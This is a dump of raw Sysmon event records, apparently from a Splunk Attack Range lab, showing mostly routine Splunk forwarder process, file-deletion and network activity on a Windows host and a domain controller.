10341000x8000000000000000807243Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.450{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F443-60EB-6A79-00000000D001}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807242Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.435{0C1E0330-F443-60EB-6A79-00000000D001}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:28.182{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C1431789641D10AC74B21DF38A31591,SHA256=2E87DC8136142C4869295EA58C6ECB351DA64D8C76EEEEAED399971B53EF6D60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807271Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.154{0C1E0330-F444-60EB-6B79-00000000D001}26963116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807270Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.013{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F444-60EB-6B79-00000000D001}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807269Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807268Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807267Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807266Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807265Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807264Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807263Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807262Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807261Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807260Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.013{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F444-60EB-6B79-00000000D001}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807259Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.013{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F444-60EB-6B79-00000000D001}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807258Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.000{0C1E0330-F444-60EB-6B79-00000000D001}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001048009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:21.710{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51000-false10.0.1.12-8000- 23542300x80000000000000001048008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:29.186{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88B471820ED4EE707A00799E9A805CE8,SHA256=09F845C9C33489AB534A14EB99788F6ACF0D267D31BD2CBE7AF30601D507E196,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807273Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.997{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C59883B1B7FD301FB08EE81A3B4ABB8,SHA256=3211B551F4F0B57D2AB410412318CABE6FBA89FE428EFC0B5E2E51CF60F17E09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807272Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.997{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=378E72CB2BD294240CCA1886D75710D3,SHA256=A82BEDD0B87992A7E04072A8ABF05912553FE08A09CE8724360D110FDE63859D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:30.204{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75D6CC267F01B4ADF2FB1DAA99FCBFA3,SHA256=1FC7AD1781D51C3E42CC5143B8A36E91AF5279E07094D0237586B9CEC80F82CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807276Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:29.208{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57241-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807275Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:30.075{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=A6AFBFF79460CD593D48293C6D0A882D,SHA256=9106757869B1D3D07E8307942F8DF051644E924DCD5DDEB1C49F479BB0A2550C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807274Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:30.013{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D998E6C5B963F63AA11D8928DEEF733F,SHA256=EA7B249B0483F0BFC85C3B650BB63CF8472D7EF646327AD5CF79077FF9CD141C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:31.219{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29F3F927D18AFDF1C1D897BC48B0008B,SHA256=FB798AFA0E0BE175F7A59344BC6F562C9D9A8461C4BDE373023F5427B7B22671,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807277Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:31.044{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB28D8A3C2D731C04F749842F2B38561,SHA256=85BA630C078E58F568E7EE88779022EC3CD2C36312813E1582CF9592CDD0F183,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:32.219{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42F127F2AF1EFC708D278744433BD97C,SHA256=D0CFB2F3A7FC0F2CC376DC6A14B9DBE6A4707276471BA8E76A6A74B83F200384,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807278Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:32.075{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90482ABA7A446BCCAF8F50CF4A886F46,SHA256=857AC1DCE07BA0B6C5B5B02F3432EB570BEFA931DCB72B3A347E7BFB961F285E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807279Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:33.122{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=076E33FCE5AAF58F939D8C7009A3D559,SHA256=070A9543346D7084E52F31584489B3DF525D9021C1FD80A538A1397E285FAC4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:33.604{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F34468D43B681C5D2673680BC5AAF85C,SHA256=34105B235A84E5A12A4261DB205008867BA77D582159CB0B5DCC10D5A5D290E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:33.604{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A7B4F8ADF72ECEDB6D0BCD4318509E9,SHA256=6238318A3A91D0799E84E7F08899BAF2665DFD3CDD8EF0A42F65B118354B93F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:33.235{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8535836C4E5AC9A35A825916AAA4757C,SHA256=93FB46626D023B21DB43098A423C3412B4AEC52D4220ACA985230B5CF0B5DCAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807280Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:34.158{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEFD354E5670710E9C4F49DAAFC059AB,SHA256=9B47BA1FDC79DA72B362AE0E600BAE7120995BEA831C0E61A39FFB42B83C97DF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:25.863{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.242.110.130amahgoob33.ptr1.ru64726-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001048016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:34.235{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6E92775AD655510929F748DFBCE1FD4,SHA256=4E955D43D9F406B87B071F6CB795FA39FC9303F4BA36CA05878D9B1838FBE96A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807282Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:34.306{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57242-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807281Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:35.158{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 